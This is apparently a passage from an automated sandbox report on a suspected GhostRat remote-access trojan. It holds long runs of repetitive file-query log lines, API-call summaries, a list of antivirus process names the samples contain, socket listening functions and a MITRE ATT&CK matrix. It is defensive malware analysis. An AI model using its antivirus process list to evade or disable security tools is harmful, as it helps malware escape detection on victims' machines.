    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_100113E9 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_100113E9
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_00B68A46 _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,8_2_00B68A46
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03385D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_03385D22
    Source: C:\Users\user\AppData\Roaming\wyySetups64.exeCode function: 1_2_03376A70 wsprintfW,GetCurrentProcessId,wsprintfW,_memset,GetVersionExW,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,wsprintfW,1_2_03376A70
    Source: wyySetups64.exeBinary or memory string: vsserv.exe
    Source: wyySetups64.exeBinary or memory string: avcenter.exe
    Source: wyySetups64.exeBinary or memory string: cfp.exe
    Source: 360instpatch.exeBinary or memory string: SuperKiller.exe
    Source: wyySetups64.exeBinary or memory string: rtvscan.exe
    Source: wyySetups64.exeBinary or memory string: TMBMSRV.exe
    Source: 360instpatch.exe, 00000008.00000003.1819390300.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
    Source: 360instpatch.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360Safe.exe
    Source: 360instpatch.exeBinary or memory string: \SuperKiller.exe
    Source: wyySetups64.exeBinary or memory string: avgwdsvc.exe
    Source: 360instpatch.exeBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
    Source: 360instpatch.exeBinary or memory string: firstaid\superkiller.exe
    Source: 360instpatch.exeBinary or memory string: Software\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
    Source: wyySetups64.exeBinary or memory string: K7TSecurity.exe
    Source: wyySetups64.exeBinary or memory string: acs.exe
    Source: wyySetups64.exeBinary or memory string: kxetray.exe
    Source: wyySetups64.exeBinary or memory string: KSafeTray.exe
    Source: wyySetups64.exeBinary or memory string: avp.exe
    Source: 360instpatch.exeBinary or memory string: 360safe.exe
    Source: wyySetups64.exeBinary or memory string: 360Safe.exe
    Source: 360instpatch.exeBinary or memory string: 360tray.exe
    Source: wyySetups64.exeBinary or memory string: ashDisp.exe
    Source: wyySetups64.exeBinary or memory string: 360Tray.exe
    Source: wyySetups64.exeBinary or memory string: AYAgent.aye
    Source: wyySetups64.exeBinary or memory string: QUHLPSVC.EXE
    Source: wyySetups64.exeBinary or memory string: RavMonD.exe
    Source: wyySetups64.exeBinary or memory string: Mcshield.exe

    Stealing of Sensitive Information

    barindex
    Yara detected GhostRat
    Source: Yara matchFile source: Process Memory Space: wyySetups64.exe PID: 3624, type: MEMORYSTR
    Queries disk data (e.g. SMART data)
    Source: C:\Users\user\Downloads\360instpatch.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior
    Source: C:\Users\user\Downloads\360instpatch.exeDevice IO: \Device\Harddisk0\DR0Jump to behavior

    Remote Access Functionality

    barindex
    Yara detected GhostRat
    Source: Yara matchFile source: Process Memory Space: wyySetups64.exe PID: 3624, type: MEMORYSTR
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_1000EE80 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,0_2_1000EE80
    Source: C:\Users\user\Desktop\wyySetups64.exeCode function: 0_2_00D5EE57 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcBindingSetAuthInfoExA,RpcStringFreeW,0_2_00D5EE57
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF321AC socket,_memset,htonl,htonl,htons,htonl,bind,8_2_6BF321AC
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF2FB95 htonl,bind,8_2_6BF2FB95
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF2FEA4 listen,8_2_6BF2FEA4
    Source: C:\Users\user\Downloads\360instpatch.exeCode function: 8_2_6BF30BA3 listen,8_2_6BF30BA3

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Replication Through Removable Media    		2
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Disable or Modify Tools    		121
    Input Capture    		2
    System Time Discovery    		Remote Services1
    Archive Collected Data    		2
    Ingress Tool Transfer    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts2
    Native API    		1
    Bootkit    		1
    Access Token Manipulation    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory11
    Peripheral Device Discovery    		Remote Desktop Protocol1
    Screen Capture    		11
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts2
    Command and Scripting Interpreter    		Logon Script (Windows)223
    Process Injection    		2
    Obfuscated Files or Information    		Security Account Manager1
    Account Discovery    		SMB/Windows Admin Shares121
    Input Capture    		1
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    PowerShell    		Login HookLogin Hook1
    Software Packing    		NTDS4
    File and Directory Discovery    		Distributed Component Object Model2
    Clipboard Data    		2
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets246
    System Information Discovery    		SSHKeylogging13
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Masquerading    		Cached Domain Credentials1
    Query Registry    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Modify Registry    		DCSync361
    Security Software Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
    Virtualization/Sandbox Evasion    		Proc Filesystem141
    Virtualization/Sandbox Evasion    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Access Token Manipulation    		/etc/passwd and /etc/shadow13
    Process Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron223
    Process Injection    		Network Sniffing11
    Application Window Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
    Bootkit    		Input Capture1
    System Owner/User Discovery    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
    Indicator Removal    		Keylogging1
    System Network Configuration Discovery    		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
